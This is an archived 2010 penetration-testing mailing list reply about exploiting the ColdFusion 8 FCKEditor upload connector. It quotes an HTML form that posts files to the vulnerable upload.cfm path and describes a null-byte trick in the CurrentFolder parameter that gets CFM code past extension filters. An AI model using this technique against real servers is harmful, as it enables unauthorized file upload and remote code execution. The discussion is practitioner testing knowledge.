Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: ColdFusion 8 w/ FCKEditor

From: "George A. Theall" <theall () tifaware com>
Date: Wed, 30 Jun 2010 19:42:19 -0400
On Wed, Jun 30, 2010 at 05:59:04PM -0300, The Dead wrote:

I got two servers with this condition.

In one of the server, CFM files were allowed to be uploaded as ASP and
others. It was simple to upload to the server using a HTML based form
as:

<html>
<form action="http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?";
method="post" enctype="multipart/form-data">
      <input type="file" name="NewFile"></input>
      <input type="submit">
</form>

In another server, CFM extensions and others like ASP, PHP are not
allowed to be uploaded.
So, I?m trying something to solve this case.


The trick is to pass the name of the destination file through the
'CurrentFolder' parameter and follow it by a NULL byte, use an innocuous
file name for 'NewFile', and include CFM code as the contents.  I
suppose you might be able to substitute ASP code or something else, but
you _know_ the server supports Coldfusion scripts.

George
-- 
theall () tifaware com

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: